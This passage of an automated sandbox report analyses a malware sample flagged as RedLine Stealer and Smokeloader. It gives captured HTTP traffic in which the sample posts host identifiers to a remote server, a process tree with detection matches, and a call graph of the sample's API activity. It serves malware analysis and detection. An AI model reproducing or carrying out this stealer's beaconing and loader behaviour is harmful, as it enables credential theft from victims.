                                                                                                  2025-01-05 07:55:11 UTC15331OUTData Raw: 2d 2d 52 36 43 4a 58 33 58 4f 45 42 35 38 4c 51 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 43 43 37 35 30 31 43 31 39 36 39 32 38 33 36 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 52 36 43 4a 58 33 58 4f 45 42 35 38 4c 51 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 52 36 43 4a 58 33 58 4f 45 42 35 38 4c 51 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 52 36 43 4a 58 33 58 4f 45 42
                                                                                                  Data Ascii: --R6CJX3XOEB58LQLContent-Disposition: form-data; name="hwid"1CC7501C19692836822D1F4978021086--R6CJX3XOEB58LQLContent-Disposition: form-data; name="pid"3--R6CJX3XOEB58LQLContent-Disposition: form-data; name="lid"4h5VfH----R6CJX3XOEB
                                                                                                  2025-01-05 07:55:11 UTC4609OUTData Raw: 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 6f 86 49 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                  Data Ascii: +?2+?2+?o?Mp5p_oI
                                                                                                  2025-01-05 07:55:12 UTC1121INHTTP/1.1 200 OK
                                                                                                  Date: Sun, 05 Jan 2025 07:55:12 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Set-Cookie: PHPSESSID=3mk5ue5ed9l0rhe8ek90qofc5u; expires=Thu, 01 May 2025 01:41:51 GMT; Max-Age=9999999; path=/
                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                  Pragma: no-cache
                                                                                                  X-Frame-Options: DENY
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                  cf-cache-status: DYNAMIC
                                                                                                  vary: accept-encoding
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sV%2FDXr3bCRHmwXltHbrCRqAUoWaqLM4C4oCQoQfvj11ia3refCpu80cMbqz41ECFjdZAVC4UMX8b97ildXFVcWwNfAsQEBEpP0Jp2OTA4cS5ke5srWi0u6upUIMUkWtNU5L7"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8fd1e797dd89c32e-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1631&min_rtt=1623&rtt_var=625&sent=11&recv=23&lost=0&retrans=0&sent_bytes=2836&recv_bytes=20899&delivery_rate=1727810&cwnd=178&unsent_bytes=0&cid=041ba584b1ef65b2&ts=752&x=0"
                                                                                                  2025-01-05 07:55:12 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                  2025-01-05 07:55:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 0


                                                                                                  Click to jump to process

                                                                                                  Click to jump to process

                                                                                                  Click to dive into process behavior distribution

                                                                                                  Click to jump to process

                                                                                                  Target ID:0
                                                                                                  Start time:02:54:59
                                                                                                  Start date:05/01/2025
                                                                                                  Path:C:\Users\user\Desktop\IH5XqCdf06.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\Desktop\IH5XqCdf06.exe"
                                                                                                  Imagebase:0x400000
                                                                                                  File size:371'712 bytes
                                                                                                  MD5 hash:3BD2D12ED926118BEB65B4CF48B49D5B
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.4569778024.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                  Reputation:low
                                                                                                  Has exited:false

                                                                                                  Target ID:3
                                                                                                  Start time:02:55:03
                                                                                                  Start date:05/01/2025
                                                                                                  Path:C:\Users\user\AppData\Local\Temp\5734.tmp.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\5734.tmp.exe"
                                                                                                  Imagebase:0x400000
                                                                                                  File size:330'240 bytes
                                                                                                  MD5 hash:E7A39D1C95A0D6EDCDA94874D38987C2
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000003.00000002.2291465028.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000003.00000002.2291502941.00000000020B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2291082783.00000000004C3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 100%, Avira
                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                  • Detection: 53%, ReversingLabs
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  Target ID:6
                                                                                                  Start time:02:55:12
                                                                                                  Start date:05/01/2025
                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3544 -s 1832
                                                                                                  Imagebase:0xec0000
                                                                                                  File size:483'680 bytes
                                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Reset < >

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:2.1%
                                                                                                    Dynamic/Decrypted Code Coverage:20.5%
                                                                                                    Signature Coverage:5.7%
                                                                                                    Total number of Nodes:760
                                                                                                    Total number of Limit Nodes:20
                                                                                                    execution_graph 64339 600000 64342 600006 64339->64342 64343 600015 64342->64343 64346 6007a6 64343->64346 64347 6007c1 64346->64347 64348 6007ca CreateToolhelp32Snapshot 64347->64348 64349 6007e6 Module32First 64347->64349 64348->64347 64348->64349 64350 6007f5 64349->64350 64352 600005 64349->64352 64353 600465 64350->64353 64354 600490 64353->64354 64355 6004a1 VirtualAlloc 64354->64355 64356 6004d9 64354->64356 64355->64356 64357 402c04 InternetOpenW 64358 402e55 64357->64358 64361 402c37 Hash 64357->64361 64378 40f8cf 64358->64378 64360 402e64 64369 42defd 64361->64369 64364 42defd std::_Locinfo::_Locinfo_ctor 26 API calls 64365 402e17 64364->64365 64366 42defd std::_Locinfo::_Locinfo_ctor 26 API calls 64365->64366 64367 402e29 InternetOpenUrlW 64366->64367 64367->64358 64368 402e44 InternetCloseHandle InternetCloseHandle 64367->64368 64368->64358 64372 42df1a 64369->64372 64374 42df0c 64369->64374 64371 42df24 64386 42a59d 26 API calls _Deallocate 64371->64386 64385 42eac9 20 API calls _Atexit 64372->64385 64374->64372 64376 42df4a 64374->64376 64375 402e09 64375->64364 64376->64375 64387 42eac9 20 API calls _Atexit 64376->64387 64379 40f8d8 64378->64379 64380 40f8da IsProcessorFeaturePresent 64378->64380 64379->64360 64382 40f94d 64380->64382 64388 40f911 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 64382->64388 64384 40fa30 64384->64360 64385->64371 64386->64375 64387->64371 64388->64384 64389 40fc06 64390 40fc12 CallCatchBlock 64389->64390 64418 40fff3 64390->64418 64392 40fc19 64393 40fd6c 64392->64393 64396 40fc43 64392->64396 64439 4104d3 4 API calls 2 library calls 64393->64439 64395 40fd73 64440 42ffc9 28 API calls _Atexit 64395->64440 64407 40fc82 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 64396->64407 64433 42fcee 5 API calls __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 64396->64433 64398 40fd79 64441 42ff7b 28 API calls _Atexit 64398->64441 64401 40fc5c 64403 40fc62 64401->64403 64434 42fc92 5 API calls __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 64401->64434 64402 40fd81 64405 40fce3 64429 4105ed 64405->64429 64407->64405 64435 42a366 167 API calls 4 library calls 64407->64435 64409 40fce9 64410 40fcfe 64409->64410 64436 410623 GetModuleHandleW 64410->64436 64412 40fd05 64412->64395 64413 40fd09 64412->64413 64414 40fd12 64413->64414 64437 42ff6c 28 API calls _Atexit 64413->64437 64438 410182 13 API calls 2 library calls 64414->64438 64417 40fd1a 64417->64403 64419 40fffc 64418->64419 64442 41077b IsProcessorFeaturePresent 64419->64442 64421 410008 64443 428827 10 API calls 3 library calls 64421->64443 64423 41000d 64424 410011 64423->64424 64444 4317a1 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 64423->64444 64424->64392 64426 41001a 64427 410028 64426->64427 64445 428850 8 API calls 3 library calls 64426->64445 64427->64392 64446 426830 64429->64446 64432 410613 64432->64409 64433->64401 64434->64407 64435->64405 64436->64412 64437->64414 64438->64417 64439->64395 64440->64398 64441->64402 64442->64421 64443->64423 64444->64426 64445->64424 64447 410600 GetStartupInfoW 64446->64447 64447->64432 64448 432785 64453 432553 64448->64453 64451 4327ad 64458 43257e 64453->64458 64455 432771 64472 42a59d 26 API calls _Deallocate 64455->64472 64457 4326d0 64457->64451 64465 43d01c 64457->64465 64458->64458 64464 4326c7 64458->64464 64468 43c8ce 170 API calls 2 library calls 64458->64468 64460 432711 64460->64464 64469 43c8ce 170 API calls 2 library calls 64460->64469 64462 432730 64462->64464 64470 43c8ce 170 API calls 2 library calls 64462->64470 64464->64457 64471 42eac9 20 API calls _Atexit 64464->64471 64473 43c9f1 64465->64473 64467 43d037 64467->64451 64468->64460 64469->64462 64470->64464 64471->64455 64472->64457 64476 43c9fd CallCatchBlock 64473->64476 64474 43ca0b 64491 42eac9 20 API calls _Atexit 64474->64491 64476->64474 64478 43ca44 64476->64478 64477 43ca10 64492 42a59d 26 API calls _Deallocate 64477->64492 64484 43cfcb 64478->64484 64483 43ca1a std::_Locinfo::_Locinfo_ctor 64483->64467 64494 43f941 64484->64494 64490 43ca68 64493 43ca91 LeaveCriticalSection __wsopen_s 64490->64493 64491->64477 64492->64483 64493->64483 64495 43f964 64494->64495 64496 43f94d 64494->64496 64498 43f983 64495->64498 64499 43f96c 64495->64499 64571 42eac9 20 API calls _Atexit 64496->64571 64575 434faa 10 API calls 2 library calls 64498->64575 64573 42eac9 20 API calls _Atexit 64499->64573 64500 43f952 64572 42a59d 26 API calls _Deallocate 64500->64572 64504 43f971 64574 42a59d 26 API calls _Deallocate 64504->64574 64505 43f98a MultiByteToWideChar 64507 43f9b9 64505->64507 64508 43f9a9 GetLastError 64505->64508 64577 4336a7 21 API calls 3 library calls 64507->64577 64576 42ea93 20 API calls 2 library calls 64508->64576 64511 43cfe1 64511->64490 64518 43d03c 64511->64518 64512 43f9c1 64513 43f9e9 64512->64513 64514 43f9c8 MultiByteToWideChar 64512->64514 64516 43346a _free 20 API calls 64513->64516 64514->64513 64515 43f9dd GetLastError 64514->64515 64578 42ea93 20 API calls 2 library calls 64515->64578 64516->64511 64579 43cd9f 64518->64579 64521 43d087 64597 43977e 64521->64597 64522 43d06e 64611 42eab6 20 API calls _Atexit 64522->64611 64525 43d073 64612 42eac9 20 API calls _Atexit 64525->64612 64526 43d08c 64527 43d095 64526->64527 64528 43d0ac 64526->64528 64613 42eab6 20 API calls _Atexit 64527->64613 64610 43cd0a CreateFileW 64528->64610 64532 43d09a 64614 42eac9 20 API calls _Atexit 64532->64614 64533 43d162 GetFileType 64536 43d1b4 64533->64536 64537 43d16d GetLastError 64533->64537 64535 43d137 GetLastError 64616 42ea93 20 API calls 2 library calls 64535->64616 64619 4396c7 21 API calls 3 library calls 64536->64619 64617 42ea93 20 API calls 2 library calls 64537->64617 64538 43d0e5 64538->64533 64538->64535 64615 43cd0a CreateFileW 64538->64615 64542 43d17b CloseHandle 64542->64525 64545 43d1a4 64542->64545 64544 43d12a 64544->64533 64544->64535 64618 42eac9 20 API calls _Atexit 64545->64618 64547 43d1d5 64549 43d221 64547->64549 64620 43cf1b 169 API calls 4 library calls 64547->64620 64548 43d1a9 64548->64525 64553 43d24e 64549->64553 64621 43cabd 167 API calls 4 library calls 64549->64621 64552 43d247 64552->64553 64554 43d25f 64552->64554 64622 4335cd 29 API calls 2 library calls 64553->64622 64556 43d009 64554->64556 64557 43d2dd CloseHandle 64554->64557 64565 43346a 64556->64565 64623 43cd0a CreateFileW 64557->64623 64559 43d308 64560 43d312 GetLastError 64559->64560 64561 43d257 64559->64561 64624 42ea93 20 API calls 2 library calls 64560->64624 64561->64556 64563 43d31e 64625 439890 21 API calls 3 library calls 64563->64625 64566 433475 HeapFree 64565->64566 64570 43349e _free 64565->64570 64567 43348a 64566->64567 64566->64570 64648 42eac9 20 API calls _Atexit 64567->64648 64569 433490 GetLastError 64569->64570 64570->64490 64571->64500 64572->64511 64573->64504 64574->64511 64575->64505 64576->64511 64577->64512 64578->64513 64580 43cdc0 64579->64580 64581 43cdda 64579->64581 64580->64581 64633 42eac9 20 API calls _Atexit 64580->64633 64626 43cd2f 64581->64626 64584 43cdcf 64634 42a59d 26 API calls _Deallocate 64584->64634 64586 43ce12 64587 43ce41 64586->64587 64635 42eac9 20 API calls _Atexit 64586->64635 64595 43ce94 64587->64595 64637 42ffdf 26 API calls 2 library calls 64587->64637 64590 43ce8f 64592 43cf0e 64590->64592 64590->64595 64591 43ce36 64636 42a59d 26 API calls _Deallocate 64591->64636 64638 42a5ca 11 API calls _Atexit 64592->64638 64595->64521 64595->64522 64596 43cf1a 64598 43978a CallCatchBlock 64597->64598 64641 42e3ed EnterCriticalSection 64598->64641 64600 4397d8 64642 439887 64600->64642 64602 4397b6 64645 43955d 21 API calls 3 library calls 64602->64645 64603 439791 64603->64600 64603->64602 64607 439824 EnterCriticalSection 64603->64607 64604 439801 std::_Locinfo::_Locinfo_ctor 64604->64526 64606 4397bb 64606->64600 64646 4396a4 EnterCriticalSection 64606->64646 64607->64600 64608 439831 LeaveCriticalSection 64607->64608 64608->64603 64610->64538 64611->64525 64612->64556 64613->64532 64614->64525 64615->64544 64616->64525 64617->64542 64618->64548 64619->64547 64620->64549 64621->64552 64622->64561 64623->64559 64624->64563 64625->64561 64629 43cd47 64626->64629 64627 43cd62 64627->64586 64629->64627 64639 42eac9 20 API calls _Atexit 64629->64639 64630 43cd86 64640 42a59d 26 API calls _Deallocate 64630->64640 64632 43cd91 64632->64586 64633->64584 64634->64581 64635->64591 64636->64587 64637->64590 64638->64596 64639->64630 64640->64632 64641->64603 64647 42e435 LeaveCriticalSection 64642->64647 64644 43988e 64644->64604 64645->64606 64646->64600 64647->64644 64648->64569 64649 64003c 64650 640049 64649->64650 64664 640e0f SetErrorMode SetErrorMode 64650->64664 64655 640265 64656 6402ce VirtualProtect 64655->64656 64658 64030b 64656->64658 64657 640439 VirtualFree 64660 6405f4 LoadLibraryA 64657->64660 64663 6404be 64657->64663 64658->64657 64659 6404e3 LoadLibraryA 64659->64663 64662 6408c7 64660->64662 64663->64659 64663->64660 64665 640223 64664->64665 64666 640d90 64665->64666 64667 640dad 64666->64667 64668 640dbb GetPEB 64667->64668 64669 640238 VirtualAlloc 64667->64669 64668->64669 64669->64655 64670 43410a 64671 434116 CallCatchBlock 64670->64671 64672 434122 64671->64672 64673 434139 64671->64673 64704 42eac9 20 API calls _Atexit 64672->64704 64683 42caff EnterCriticalSection 64673->64683 64676 434149 64684 434186 64676->64684 64677 434127 64705 42a59d 26 API calls _Deallocate 64677->64705 64680 434155 64706 43417c LeaveCriticalSection __fread_nolock 64680->64706 64682 434132 std::_Locinfo::_Locinfo_ctor 64683->64676 64685 434194 64684->64685 64686 4341ae 64684->64686 64717 42eac9 20 API calls _Atexit 64685->64717 64707 432908 64686->64707 64689 434199 64718 42a59d 26 API calls _Deallocate 64689->64718 64690 4341b7 64714 4347d3 64690->64714 64694 4342bb 64696 4342c8 64694->64696 64703 43426e 64694->64703 64695 43423f 64697 43425c 64695->64697 64695->64703 64720 42eac9 20 API calls _Atexit 64696->64720 64719 43449f 31 API calls 4 library calls 64697->64719 64700 434266 64701 4341a4 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 64700->64701 64701->64680 64703->64701 64721 43431b 30 API calls 2 library calls 64703->64721 64704->64677 64705->64682 64706->64682 64708 432914 64707->64708 64709 432929 64707->64709 64722 42eac9 20 API calls _Atexit 64708->64722 64709->64690 64711 432919 64723 42a59d 26 API calls _Deallocate 64711->64723 64713 432924 64713->64690 64724 434650 64714->64724 64716 4341d3 64716->64694 64716->64695 64716->64701 64717->64689 64718->64701 64719->64700 64720->64701 64721->64701 64722->64711 64723->64713 64725 43465c CallCatchBlock 64724->64725 64726 434664 64725->64726 64727 43467c 64725->64727 64759 42eab6 20 API calls _Atexit 64726->64759 64729 434730 64727->64729 64734 4346b4 64727->64734 64764 42eab6 20 API calls _Atexit 64729->64764 64730 434669 64760 42eac9 20 API calls _Atexit 64730->64760 64733 434735 64765 42eac9 20 API calls _Atexit 64733->64765 64749 4396a4 EnterCriticalSection 64734->64749 64737 43473d 64766 42a59d 26 API calls _Deallocate 64737->64766 64738 4346ba 64740 4346f3 64738->64740 64741 4346de 64738->64741 64750 434755 64740->64750 64761 42eac9 20 API calls _Atexit 64741->64761 64742 434671 std::_Locinfo::_Locinfo_ctor 64742->64716 64745 4346ee 64763 434728 LeaveCriticalSection __wsopen_s 64745->64763 64746 4346e3 64762 42eab6 20 API calls _Atexit 64746->64762 64749->64738 64767 439921 64750->64767 64752 434767 64753 434780 SetFilePointerEx 64752->64753 64754 43476f 64752->64754 64755 434774 64753->64755 64756 434798 GetLastError 64753->64756 64780 42eac9 20 API calls _Atexit 64754->64780 64755->64745 64781 42ea93 20 API calls 2 library calls 64756->64781 64759->64730 64760->64742 64761->64746 64762->64745 64763->64742 64764->64733 64765->64737 64766->64742 64768 43992e 64767->64768 64772 439943 64767->64772 64782 42eab6 20 API calls _Atexit 64768->64782 64771 439933 64783 42eac9 20 API calls _Atexit 64771->64783 64773 439968 64772->64773 64784 42eab6 20 API calls _Atexit 64772->64784 64773->64752 64774 439973 64785 42eac9 20 API calls _Atexit 64774->64785 64777 43993b 64777->64752 64778 43997b 64786 42a59d 26 API calls _Deallocate 64778->64786 64780->64755 64781->64755 64782->64771 64783->64777 64784->64774 64785->64778 64786->64777 64787 4332de 64788 4332eb 64787->64788 64792 433303 64787->64792 64837 42eac9 20 API calls _Atexit 64788->64837 64790 4332f0 64838 42a59d 26 API calls _Deallocate 64790->64838 64793 43335e 64792->64793 64801 4332fb 64792->64801 64839 434ccd 21 API calls 2 library calls 64792->64839 64795 432908 __fread_nolock 26 API calls 64793->64795 64796 433376 64795->64796 64807 432e16 64796->64807 64798 43337d 64799 432908 __fread_nolock 26 API calls 64798->64799 64798->64801 64800 4333a9 64799->64800 64800->64801 64802 432908 __fread_nolock 26 API calls 64800->64802 64803 4333b7 64802->64803 64803->64801 64804 432908 __fread_nolock 26 API calls 64803->64804 64805 4333c7 64804->64805 64806 432908 __fread_nolock 26 API calls 64805->64806 64806->64801 64808 432e22 CallCatchBlock 64807->64808 64809 432e42 64808->64809 64810 432e2a 64808->64810 64812 432f08 64809->64812 64816 432e7b 64809->64816 64906 42eab6 20 API calls _Atexit 64810->64906 64913 42eab6 20 API calls _Atexit 64812->64913 64813 432e2f 64907 42eac9 20 API calls _Atexit 64813->64907 64819 432e8a 64816->64819 64820 432e9f 64816->64820 64817 432f0d 64914 42eac9 20 API calls _Atexit 64817->64914 64908 42eab6 20 API calls _Atexit 64819->64908 64840 4396a4 EnterCriticalSection 64820->64840 64822 432e97 64915 42a59d 26 API calls _Deallocate 64822->64915 64824 432ea5 64826 432ec1 64824->64826 64827 432ed6 64824->64827 64825 432e8f 64909 42eac9 20 API calls _Atexit 64825->64909 64910 42eac9 20 API calls _Atexit 64826->64910 64841 432f29 64827->64841 64829 432e37 std::_Locinfo::_Locinfo_ctor 64829->64798 64833 432ec6 64911 42eab6 20 API calls _Atexit 64833->64911 64834 432ed1 64912 432f00 LeaveCriticalSection __wsopen_s 64834->64912 64837->64790 64838->64801 64839->64793 64840->64824 64842 432f53 64841->64842 64843 432f3b 64841->64843 64845 4332bd 64842->64845 64850 432f98 64842->64850 64925 42eab6 20 API calls _Atexit 64843->64925 64943 42eab6 20 API calls _Atexit 64845->64943 64846 432f40 64926 42eac9 20 API calls _Atexit 64846->64926 64849 4332c2 64944 42eac9 20 API calls _Atexit 64849->64944 64851 432f48 64850->64851 64853 432fa3 64850->64853 64859 432fd3 64850->64859 64851->64834 64927 42eab6 20 API calls _Atexit 64853->64927 64855 432fa8 64928 42eac9 20 API calls _Atexit 64855->64928 64858 432fb0 64945 42a59d 26 API calls _Deallocate 64858->64945 64860 432fec 64859->64860 64861 433012 64859->64861 64862 43302e 64859->64862 64860->64861 64866 432ff9 64860->64866 64929 42eab6 20 API calls _Atexit 64861->64929 64932 4336a7 21 API calls 3 library calls 64862->64932 64865 433017 64930 42eac9 20 API calls _Atexit 64865->64930 64916 43d365 64866->64916 64867 433045 64870 43346a _free 20 API calls 64867->64870 64873 43304e 64870->64873 64871 433197 64874 43320d 64871->64874 64876 4331b0 GetConsoleMode 64871->64876 64872 43301e 64931 42a59d 26 API calls _Deallocate 64872->64931 64877 43346a _free 20 API calls 64873->64877 64878 433211 ReadFile 64874->64878 64876->64874 64879 4331c1 64876->64879 64880 433055 64877->64880 64881 433285 GetLastError 64878->64881 64882 43322b 64878->64882 64879->64878 64883 4331c7 ReadConsoleW 64879->64883 64884 43307a 64880->64884 64885 43305f 64880->64885 64886 433292 64881->64886 64887 4331e9 64881->64887 64882->64881 64888 433202 64882->64888 64883->64888 64890 4331e3 GetLastError 64883->64890 64935 4347ee 64884->64935 64933 42eac9 20 API calls _Atexit 64885->64933 64941 42eac9 20 API calls _Atexit 64886->64941 64903 433029 __fread_nolock 64887->64903 64938 42ea93 20 API calls 2 library calls 64887->64938 64898 433250 64888->64898 64899 433267 64888->64899 64888->64903 64890->64887 64891 43346a _free 20 API calls 64891->64851 64894 433297 64942 42eab6 20 API calls _Atexit 64894->64942 64896 433064 64934 42eab6 20 API calls _Atexit 64896->64934 64939 432c45 31 API calls 3 library calls 64898->64939 64902 43327e 64899->64902 64899->64903 64940 432a85 29 API calls __fread_nolock 64902->64940 64903->64891 64905 433283 64905->64903 64906->64813 64907->64829 64908->64825 64909->64822 64910->64833 64911->64834 64912->64829 64913->64817 64914->64822 64915->64829 64917 43d372 64916->64917 64919 43d37f 64916->64919 64946 42eac9 20 API calls _Atexit 64917->64946 64921 43d38b 64919->64921 64947 42eac9 20 API calls _Atexit 64919->64947 64920 43d377 64920->64871 64921->64871 64923 43d3ac 64948 42a59d 26 API calls _Deallocate 64923->64948 64925->64846 64926->64851 64927->64855 64928->64858 64929->64865 64930->64872 64931->64903 64932->64867 64933->64896 64934->64903 64936 434755 __fread_nolock 28 API calls 64935->64936 64937 434804 64936->64937 64937->64866 64938->64903 64939->64903 64940->64905 64941->64894 64942->64903 64943->64849 64944->64858 64945->64851 64946->64920 64947->64923 64948->64920 64949 402bad RegCreateKeyExW 64950 402bdb RegSetValueExW 64949->64950 64951 402bef 64949->64951 64950->64951 64952 402bf4 RegCloseKey 64951->64952 64953 402bfd 64951->64953 64952->64953 64954 404b8e 64955 404b9a Concurrency::details::_TaskCollection::_Alias 64954->64955 64960 40fb0c 64955->64960 64959 404bba Concurrency::details::_TaskCollection::_Alias _MallocaArrayHolder 64962 40fb11 64960->64962 64963 404ba3 64962->64963 64965 40fb2d Concurrency::details::_TaskCollection::_Alias 64962->64965 64984 42ad7e 64962->64984 64991 42f450 7 API calls 2 library calls 64962->64991 64968 4051d0 64963->64968 64992 42860d RaiseException 64965->64992 64967 4103cc 64969 4051dc Concurrency::details::_TaskCollection::_Alias __Cnd_init 64968->64969 64971 4051f4 __Mtx_init 64969->64971 65003 40ce32 28 API calls std::_Throw_Cpp_error 64969->65003 64972 40521b 64971->64972 65004 40ce32 28 API calls std::_Throw_Cpp_error 64971->65004 64995 4010ea 64972->64995 64978 40526a 64979 40527f _MallocaArrayHolder 64978->64979 65006 401128 30 API calls 2 library calls 64978->65006 65007 401109 64979->65007 64983 4052a4 Concurrency::details::_TaskCollection::_Alias 64983->64959 64989 4336a7 std::_Locinfo::_Locinfo_ctor 64984->64989 64985 4336e5 64994 42eac9 20 API calls _Atexit 64985->64994 64987 4336d0 RtlAllocateHeap 64988 4336e3 64987->64988 64987->64989 64988->64962 64989->64985 64989->64987 64993 42f450 7 API calls 2 library calls 64989->64993 64991->64962 64992->64967 64993->64989 64994->64988 65011 40d313 64995->65011 64998 401103 65000 40cef3 64998->65000 65035 42e114 65000->65035 65003->64971 65004->64972 65005 40ce32 28 API calls std::_Throw_Cpp_error 65005->64978 65006->64978 65008 401115 __Mtx_unlock 65007->65008 65009 401122 65008->65009 65360 40ce32 28 API calls std::_Throw_Cpp_error 65008->65360 65009->64983 65015 40d06d 65011->65015 65014 40ce32 28 API calls std::_Throw_Cpp_error 65014->64998 65016 40d0c3 65015->65016 65017 40d095 GetCurrentThreadId 65015->65017 65020 40d0c7 GetCurrentThreadId 65016->65020 65021 40d0ed 65016->65021 65018 40d0a0 GetCurrentThreadId 65017->65018 65019 40d0bb 65017->65019 65018->65019 65026 40f8cf __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 65019->65026 65023 40d0d6 65020->65023 65022 40d186 GetCurrentThreadId 65021->65022 65025 40d10d 65021->65025 65022->65023 65023->65019 65024 40d1dd GetCurrentThreadId 65023->65024 65024->65019 65033 40e92f GetSystemTimeAsFileTime __aulldvrm __Xtime_get_ticks 65025->65033 65029 4010f6 65026->65029 65029->64998 65029->65014 65030 40d145 GetCurrentThreadId 65030->65023 65031 40d118 __Xtime_diff_to_millis2 65030->65031 65031->65019 65031->65023 65031->65030 65034 40e92f GetSystemTimeAsFileTime __aulldvrm __Xtime_get_ticks 65031->65034 65033->65031 65034->65031 65036 42e121 65035->65036 65037 42e135 65035->65037 65058 42eac9 20 API calls _Atexit 65036->65058 65049 42e0cb 65037->65049 65040 42e126 65059 42a59d 26 API calls _Deallocate 65040->65059 65043 42e14a CreateThread 65045 42e175 65043->65045 65046 42e169 GetLastError 65043->65046 65080 42dfc0 65043->65080 65044 405257 65044->64978 65044->65005 65061 42e03d 65045->65061 65060 42ea93 20 API calls 2 library calls 65046->65060 65069 434d2a 65049->65069 65052 43346a _free 20 API calls 65053 42e0e4 65052->65053 65054 42e103 65053->65054 65055 42e0eb GetModuleHandleExW 65053->65055 65056 42e03d __Thrd_start 22 API calls 65054->65056 65055->65054 65057 42e10d 65056->65057 65057->65043 65057->65045 65058->65040 65059->65044 65060->65045 65062 42e04a 65061->65062 65063 42e06e 65061->65063 65064 42e050 CloseHandle 65062->65064 65065 42e059 65062->65065 65063->65044 65064->65065 65066 42e068 65065->65066 65067 42e05f FreeLibrary 65065->65067 65068 43346a _free 20 API calls 65066->65068 65067->65066 65068->65063 65070 434d37 65069->65070 